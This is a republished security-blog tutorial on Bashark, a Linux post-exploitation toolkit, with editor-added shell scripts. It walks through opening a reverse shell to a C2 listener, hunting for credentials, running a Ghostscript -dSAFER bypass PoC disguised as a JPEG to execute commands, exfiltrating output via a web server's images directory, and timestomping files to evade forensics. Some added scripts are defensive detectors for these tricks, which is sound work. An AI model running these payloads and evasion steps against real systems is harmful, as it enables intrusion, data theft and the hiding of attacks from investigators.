Toolsmith Snapshot: Bashark Linux Post-Exploitation Toolkit
“Bashark aids pen testers and security researchers during the post-exploitation phase of security audits.”
Bashark is a convenient Bash script that is easy to use once you have gained access to a Linux target with either user or root permissions. It was created by TheSecondSun (Wintermute) and is available in his GitHub repository; the project's own feature list follows:
- Single Bash script
- Lightweight and fast
- Multi-platform: Unix, OSX, Solaris, etc.
- No external dependencies
- Immune to heuristic and behavioral analysis
- Built-in aliases of often used shell commands
- Extends system shell with post-exploitation oriented functionalities
- Stealthy, with custom cleanup routine activated on exit
- Easily extensible (add new commands by creating Bash functions)
- Full tab completion
On the victim system, fetch the script from a shell prompt (note that this pulls from GitHub over HTTPS, so the target needs outbound access and the download leaves a trail in DNS and proxy logs; if that matters, stage the file yourself):
curl https://raw.githubusercontent.com/TheSecondSun/Bashark/master/bashark.sh > bashark.sh
Running Bashark is as easy as sourcing the bashark.sh script from the terminal:
$ source bashark.sh
Then, type help to see Bashark’s menu. The results can be seen in Figure 1.
Figure 1: Bashark menu
I’ll walk you through some post-exploitation scenarios with Bashark. We’ll assume that we have acquired user-level permissions on our victim system initially. It’s always good to assess your operating environment as you begin. You will need to determine if you're running on bare metal or a virtual machine with isvm.
bashark_1.0$ isvm
[*] Host is running on a Virtual Machine
We can determine further host information with i.
Figure 2: Target information
Clearly, we don’t have root access, so what steps might we take to elevate privilege? First, I’m always a fan of establishing reverse shell access. Bashark enables this easily with revshell. I ran the following:
revshell 192.168.248.31 31337
And then I connected to my Ncat listener on my lab C2 box, as seen in Figure 3:
Figure 3: Reverse shell established
You could search for sensitive files that may include credentials or mission-critical data with the likes of fnd (recursive search for strings) and/or fndre (the same, with some rudimentary regular expressions). My experiments with the fndre function failed no matter how precise the test data. However, there are plenty of other enumeration options as well, including getconf (to enumerate config files), getperm (files and folders with special perms; see getperm --help), fileinfo (to inspect a file), and usrs (which shows all users on the host). Your best option might be to explore what apps are installed with getapp and determine whether vulnerable apps are present.
Figure 4: getapp results
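For readers who want to see what this enumeration does under the hood, or who want functions to drop into a fork as new Bashark commands, here is an added example (the editor's own shell, not Bashark's code) with plain-shell equivalents of getperm, fnd/fndre, usrs and getapp, plus a version check for the Ghostscript issue used in the next section. Function names are the editor's; it assumes GNU find, grep, sort and awk (Linux), with dpkg or rpm used only if present, and the 9.24 "first fixed" threshold is the editor's knowledge rather than something the article states.

```shell
#!/usr/bin/env bash
# Added example, not Bashark code: plain-shell equivalents of the enumeration
# Bashark wraps (getperm, fnd/fndre, usrs, getapp), each taking an explicit
# root or file so it can be pointed at a test tree, plus a version check for
# the Ghostscript bugs the next section uses. Function names are the editor's.
# Assumes GNU find/grep/sort/awk (Linux); dpkg/rpm are used only if present.

# getperm-style: SUID/SGID binaries and world-writable directories under $1.
# World-writable directories carrying the sticky bit (/tmp) are skipped.
find_special_perms() {
  local root="$1"
  find "$root" -xdev -type f \( -perm -4000 -o -perm -2000 \) \
       -printf 'SUID/SGID %m %u %p\n' 2>/dev/null
  find "$root" -xdev -type d -perm -0002 ! -perm -1000 \
       -printf 'WORLD-WRITABLE %p\n' 2>/dev/null
  return 0
}

# fnd/fndre-style: recursive, case-insensitive search for strings that look
# like credentials. $1 is the root; $2 an optional extended regex.
find_cred_strings() {
  local root="$1"
  local re="${2:-(passw(or)?d|secret|api[_-]?key|token)[[:space:]]*[:=]}"
  grep -rIEin --exclude-dir=proc --exclude-dir=sys --exclude-dir=dev \
       "$re" "$root" 2>/dev/null || true
}

# usrs-style: accounts with a real login shell, read from a passwd file
# ($1, default /etc/passwd), printed as name:uid:shell.
list_login_users() {
  awk -F: '$7 !~ /(nologin|false|sync|halt|shutdown)$/ { print $1 ":" $3 ":" $7 }' \
      "${1:-/etc/passwd}"
}

# getapp-style: installed version of package $1 via whichever package manager
# exists. Prints nothing and returns 1 if neither knows the package.
installed_version() {
  if command -v dpkg-query >/dev/null 2>&1; then
    dpkg-query -W -f='${Version}\n' "$1" 2>/dev/null && return 0
  fi
  if command -v rpm >/dev/null 2>&1; then
    rpm -q --qf '%{VERSION}\n' "$1" 2>/dev/null && return 0
  fi
  return 1
}

# Ghostscript check: $1 is the version string as printed by `gs --version`.
# Returns 0 if it predates 9.24, the first release carrying fixes for the
# August 2018 bugs (editor's knowledge; the article itself only cites 9.22).
gs_vulnerable() {
  local v="$1" fixed="9.24"
  [ "$v" != "$fixed" ] &&
  [ "$(printf '%s\n%s\n' "$v" "$fixed" | sort -V | head -n 1)" = "$v" ]
}

# Stand-alone use: bash enum.sh /   (no arguments: only define the functions)
if [ "$#" -gt 0 ]; then
  echo "[*] special permissions under $1"; find_special_perms "$1"
  echo "[*] credential-looking strings under $1/etc"; find_cred_strings "$1/etc"
  echo "[*] login users"; list_login_users "$1/etc/passwd"
  if command -v gs >/dev/null 2>&1; then
    gsv=$(gs --version)
    if gs_vulnerable "$gsv"; then echo "[!] ghostscript $gsv predates 9.24"
    else echo "[*] ghostscript $gsv"; fi
  fi
fi
```

Run it with a root directory argument to enumerate a host; sourced or run without arguments it only defines the functions, which is the shape Bashark itself uses.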
As an example, you likely took recent note of the Ghostscript issues (re)discovered by Google’s Tavis Ormandy: bypasses of the -dSAFER sandbox that let a PostScript file reach things it shouldn’t, the %pipe% output path included. Every release up to and including 9.23 was vulnerable, with fixes landing in 9.24 and 9.25; a quick gs -v on my victim showed 9.22 present.
Tavis’s write-up on these bugs includes some minimalist PoCs with some interesting ideas for banditry. As a red teamer, I like the applicability of stealing arbitrary files from web servers that use ImageMagick by encoding file contents into image output. If your victim target is a web server, this makes for interesting exfil opportunities: drop your output image files in the world-readable /images directory of the httpd hierarchy and fetch them over HTTP. That is a bit more stealthy than straight-up pilfering via the reverse shell you established earlier. Want to dump the results of the lshw command (which displays the hardware configuration of the system)? Try the following, which on most Ubuntu systems of the period works because ImageMagick’s convert chooses its decoder from the file’s magic bytes rather than its extension: a file that starts with %!PS is handed to Ghostscript no matter what it is called. Save the following PostScript, Tavis’s PoC, as a "JPEG", for example lshw.jpeg:
%!PS
% Tavis Ormandy's -dSAFER bypass PoC as used by the author: an error forced
% during restore leaves the interpreter in a state where SAFER no longer
% prevents redirecting OutputFile to a %pipe% command.
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
% Point the output device at a pipe: Ghostscript runs lshw, and its output
% comes back through convert.
mark /OutputFile (%pipe%lshw) currentdevice putdeviceprops
Then, run the following.
convert lshw.jpeg lshw.gif
If all goes well, your script is processed by Ghostscript and the lshw results appear in the convert output. Now that you’ve executed your evil plan, you may want to clean up your tracks before you pop smoke and vacate the premises. And what about that lshw.jpeg and lshw.gif you created? All good red teamers use timestomp to confound their blue team friends in their efforts to log2timeline their adversarial amigos. Consider how easy Bashark makes it, in Figure 5.
Figure 5: timestomp in action
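Looking at the lshw.jpeg trick from the blue side, here is an added example (the editor's own shell, not from the article, Bashark or ImageMagick) of the two checks a defender would run: a sweep of an upload or images tree for files whose extension claims an image but whose first bytes are the PostScript magic, and a check that the host's ImageMagick policy.xml disables the PS coder, which is the standard mitigation. The file names, the default policy path and the sample policy lines are the editor's assumptions.

```shell
#!/usr/bin/env bash
# Added example, not from the article, Bashark or ImageMagick: the checks the
# blue side would run against the lshw.jpeg trick above. ImageMagick picks its
# decoder from a file's magic bytes, not its extension, so a ".jpeg" beginning
# with "%!PS" is handed straight to Ghostscript; the standard mitigation is a
# policy.xml that disables the PS/EPS/PDF/XPS coders. Paths, file names and
# the sample policy lines are constructed by the editor.

# Exit 0 if $1 has an image extension but starts with the PostScript magic.
is_ps_masquerading() {
  local f="$1" magic base ext
  magic=$(head -c 4 "$f" 2>/dev/null) || return 1
  base=${f##*/}
  ext=$(printf '%s' "${base##*.}" | tr 'A-Z' 'a-z')
  [ "$magic" = "%!PS" ] || return 1
  case "$ext" in
    jpg|jpeg|png|gif|bmp|tif|tiff|webp) return 0 ;;
  esac
  return 1
}

# Walk an upload or images tree ($1) and print every masquerading file.
# The loop body always succeeds, so the report can be piped safely.
scan_for_ps_masquerade() {
  find "$1" -type f -print | while IFS= read -r f; do
    if is_ps_masquerading "$f"; then
      printf 'PS-in-image: %s\n' "$f"
    fi
  done
}

# Exit 0 if the ImageMagick policy file ($1, default the ImageMagick 6 path on
# Debian/Ubuntu) disables the PS coder, either on its own line, e.g.
#   <policy domain="coder" rights="none" pattern="PS" />
# or inside a brace list such as pattern="{PS,EPS,PDF,XPS}".
policy_blocks_ps() {
  local policy="${1:-/etc/ImageMagick-6/policy.xml}"
  [ -r "$policy" ] || return 1
  awk '/<policy/ && /domain="coder"/ && /rights="none"/ &&
       /pattern="(PS|[{]([^}]*,)?PS(,[^}]*)?[}])"/ { found = 1 }
       END { exit !found }' "$policy"
}

# Stand-alone use: bash imcheck.sh /var/www/html/images [policy.xml]
if [ "$#" -gt 0 ]; then
  scan_for_ps_masquerade "$1"
  if policy_blocks_ps "${2:-}"; then echo "[*] policy.xml blocks the PS coder"
  else echo "[!] policy.xml does not block the PS coder"; fi
fi
```

Note that the sweep keys on the magic bytes rather than on anything convert logs: the attack leaves no ImageMagick error, because the conversion succeeds, so the file itself is the evidence.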
The cleanup routine is also enabled by default, so when you quit it should do as promised and clean up behind you. For example, if you created files or directories in the Bashark context with t (create a file) or mkd (create a directory), the quit routine honors the cleanup directive and cleans them up, as seen in Figure 6.
Figure 6: I better clean up before I go
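A caveat worth knowing before relying on timestomp, shown as an added example (the editor's own shell, not Bashark's timestomp): on Linux, touch and the utimensat call behind it can set atime and mtime to anything, but ctime is written by the kernel on every inode change, the timestomp included, and cannot be set from user space without changing the system clock or editing the disk directly. A ctime newer than mtime is therefore exactly what a log2timeline-style review looks for. The file names and dates are constructed, and the helpers assume GNU stat, touch and date.

```shell
#!/usr/bin/env bash
# Added example, not Bashark's timestomp: what a timestomp actually changes on
# Linux and the check that catches it. touch sets atime/mtime freely; ctime is
# set by the kernel to "now" on every inode change, including the stomp itself.
# Assumes GNU coreutils (stat -c, touch -d/-r, date -d).

# Copy the timestamps of a reference file ($2) onto the target ($1), the usual
# way to blend a dropped file in with its neighbours.
stomp_like() { touch -r "$2" "$1"; }

# Set atime/mtime of $1 to an explicit date string ($2), e.g. "2016-01-01 03:04:05".
stomp_to() { touch -d "$2" "$1"; }

# Exit 0 if ctime is more than $2 seconds (default 60) newer than mtime,
# i.e. the inode changed well after the content supposedly did. Exit 2 if
# the file cannot be stat'ed.
looks_stomped() {
  local f="$1" slack="${2:-60}" m c
  m=$(stat -c %Y "$f") && c=$(stat -c %Z "$f") || return 2
  [ $((c - m)) -gt "$slack" ]
}

# Sweep a tree ($1) and print every file whose ctime and mtime disagree.
find_stomped() {
  find "$1" -xdev -type f -print | while IFS= read -r f; do
    if looks_stomped "$f"; then
      printf '%s\n  mtime=%s\n  ctime=%s\n' "$f" "$(stat -c %y "$f")" "$(stat -c %z "$f")"
    fi
  done
}

# Stand-alone use: bash stomp.sh /var/www/html   (no arguments: define only)
if [ "$#" -gt 0 ]; then
  find_stomped "$1"
fi
```

Legitimate files trip this too (package upgrades that preserve mtime, restored backups), so the sweep is a triage list rather than a verdict; the signal is a stomped file sitting in a directory whose neighbours all have ctime and mtime in agreement.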
The only bug here is that the Bashark-sourced shell doesn’t actually quit, so throw down an exit to bail out entirely. To that end, Bashark is a bit buggy, but hey, it’s the first rev of a nice effort, so help TheSecondSun out and submit bugs (I dropped one in the queue), or fork the code and tune it. There are endless options to add as Bashark functions, so consider spinning a fork and expanding on the theme. Hope you have fun with this one; it’s definitely a great starting point for *nix post-exploitation fun. Enjoy!
Cheers until next time!
Published at DZone with permission of Russ McRee, DZone MVB. See the original article here.